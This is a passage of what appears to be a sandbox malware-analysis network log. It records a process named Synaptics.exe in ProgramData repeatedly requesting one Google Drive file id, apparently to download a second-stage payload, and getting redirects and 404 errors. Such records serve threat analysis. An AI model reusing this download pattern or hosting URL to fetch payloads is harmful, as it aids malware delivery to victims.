                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 74 5f 66 77 76 57 45 55 2d 73 41 39 54 39 33 68 54 56 78 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="Gt_fwvWEU-sA9T93hTVxQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.649790142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:40 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC76cqJ3W25Jf1booRyStDEV_5AI1mbZPmTsBrO-1sHDjuqS0ngSxnD17p6MmIa8_j_Y
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:41 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2H8NIJIPIxxXHn2Uold6fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 39 75 2d 37 67 46 39 4e 37 54 67 4e 42 71 5a 38 41 68 47 6c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="f9u-7gF9N7TgNBqZ8AhGlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.649799142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:41 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.649800142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:41 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.649811142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:42 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:42 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-eWFA5zpl0JIyQKWGkU4hvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.2.649812142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:42 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:42 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wt_epjRkOGANA8H04kRH_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.2.649820142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:43 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:43 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-I_uYRCxRpQQ-EnHABk6aUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.2.649821142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:43 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:44 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6XqTKpAo8Mf7zqzLQYBwoBraZhle8kX_FUVcvq5PTSxbxoyIY9LtffNnk5hHN_N7v9
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:43 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-uAzPdoq_joE27Lj2D-nmdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:44 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:44 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 32 59 6d 69 6f 62 4b 71 2d 55 77 58 49 33 5a 65 6f 41 77 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="S2YmiobKq-UwXI3ZeoAwpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:44 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.2.649822142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:43 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:44 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6m3OBeC9iOe3ClVYOpwg_Fa6toqdSbJjE_AO1Bn9V1d79laz448qBqUopzjWZprPzgPihTV1Y
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:43 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9sP9v-uIb4I-kf1aiYy1Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:44 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:44 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 59 52 37 6b 50 57 4c 2d 38 58 73 46 51 48 61 6a 30 5f 5f 66 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="fYR7kPWL-8XsFQHaj0__fQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:44 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      21192.168.2.649823142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:43 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:43 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
